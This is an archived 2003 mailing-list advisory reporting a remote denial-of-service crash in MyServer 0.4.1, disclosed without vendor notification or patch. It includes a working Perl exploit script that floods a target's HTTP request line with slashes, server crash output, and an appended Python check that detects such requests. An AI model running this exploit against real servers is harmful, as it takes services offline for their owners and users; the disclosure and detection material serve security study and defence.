Myserver 0.4.1 DOS...

From: eipat_private-ip.com
Date: Sat Jun 21 2003 - 16:27:55 PDT


    hi..
    
    
    Topic:  	MyServer 0.4.1 DOS
    
    Product: 	Myserver 0.4.1 (http://myserverweb.sourceforge.net)
    
    Note:  		yep, I'm on the dole, anyone wanna give me a job :)
    
    Vendor Notification:	Woooops, sorry i forgot ;)
    
    
    Background:
    
    (from homepage)
    MyServer is a free and easy to configure web server. MyServer is licensed 
    under the GNU General Public License (GPL). See the license page for 
    additional info.
    Myserver runs under both Windows and Linux..
    Although there are already several flaws found in Myserver, I thought that 
    the closest bug to this was:
    http://www.securityfocus.org/bid/7770/info/
    
    but that was using excessive amounts of data.. We only need to use 20 "//" 
    to cause a DoS condition..
    
    
    Problem Description:
    
    When Myserver is running, a simple GET request can cause a remote denial of 
    service, stopping the HTTP server altogether.. 
    Also an extra note, this DOS doesn't get entered into the log file ;) 
    
    Impact:
    
    Denial of service..possible code execution, haven't tested it fully 
    yet..still finding holes  ;)
    
    Patch:
    
    Nope i don't do patches.... ;)
    
    Exploit:
    ----------------myserver.pl------------------------
    #!/usr/bin/perl
     
    #Myserver 0.4.1 Remote Denial of service ;)
    #oh joy...
    #deadbeat, uk2sec
    #eipat_private-ip.com
    #deadbeatat_private
     
    use IO::Socket;
    $dos = "//"x100;
    $request = "GET $dos"."HTTP/1.0\r\n\r\n";
     
    $target = $ARGV[0];
     
    print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
    print "deadbeat, uk2sec..\n";
    print "usage: perl $0 <target>\n";
    $sox = IO::Socket::INET->new(
            Proto=>"tcp",
            PeerPort=>"80",
            PeerAddr=>"$target"
    )or die "\nCan't connect to $target..\n";
    print $sox $request;
    sleep 2;
    close $sox;
    print "Done...\n";
    ------------------EOF--------------------------
    
    Looks like this from the server side:
    -------------------------
    **************************************
    ************myServer 0.4.1************
    **************************************
    Initializing server configuration...
    Using english language
    Server configuration terminated
    Security access is not used, the web folder contents is accessible to 
    anyone
    Initializing socket library...
    Socket library was initialized
    Computer name is: uk2sec-labs.no-ip.com
    IP Address #0: 192.168.0.1
    Loading MIME types...
    MIME types loaded successfully: 139
    Number of processors: 1
    Creating thread 0...
    Thread created
    Creating listening thread...
    Creating server socket...
    Server socket created
    Trying to binding port...
    Port is binded
    Trying to listen on port...
    Listen on port: 80
    Listening thread is created
    myServer is now ready to accept connections
    Press Ctrl+C to break execution
    Segmentation fault
    --------------------------
    
    Tested on:	Linux (redhat 9.0)
    
    regards,
    
    deadbeat, uk2sec..
    
    eipat_private-ip.com
    
    "I'm not white, black or grey, i'm just very green..."
    

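The post notes that the crashing request never reaches MyServer's log, so detection has to happen in front of the server. The following is an added example, not part of the original post or of MyServer: a Python check, assumed to run on raw request bytes seen by a reverse proxy or capture tool, that flags long slash runs and malformed request lines. `MAX_SLASH_RUN`, the function names and the sample requests are constructed for illustration.

```python
import re

# Assumed policy value, not from the post: the post reports 20 "//"
# (40 slashes) as enough to crash 0.4.1, so the limit sits well below that.
MAX_SLASH_RUN = 8
VERSION_RE = re.compile(r"HTTP/\d\.\d")
SLASH_RUN_RE = re.compile(r"/+")


def longest_slash_run(text):
    """Length of the longest run of consecutive '/' characters in text."""
    return max((len(m.group()) for m in SLASH_RUN_RE.finditer(text)), default=0)


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (bytes)."""
    findings = []
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = line.split(" ")
    if len(parts) != 3 or not VERSION_RE.fullmatch(parts[2]):
        findings.append("malformed-request-line")
    # Measure everything after the method, so a target that is fused with
    # the version token (no separating space) is still counted.
    rest = line.partition(" ")[2]
    run = longest_slash_run(rest)
    if run > MAX_SLASH_RUN:
        findings.append("slash-run:%d" % run)
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.0\r\n\r\n",
    "absolute-uri": b"GET http://example.test/a//b HTTP/1.0\r\n\r\n",
    "slash-flood": b"GET " + b"//" * 20 + b" HTTP/1.0\r\n\r\n",
    "fused-version": b"GET " + b"//" * 20 + b"HTTP/1.0\r\n\r\n",
}


def scan(samples):
    """Map each sample name to its list of findings."""
    return {name: inspect_request(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, findings in scan(SAMPLES).items():
        print(name, findings or "ok")
```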

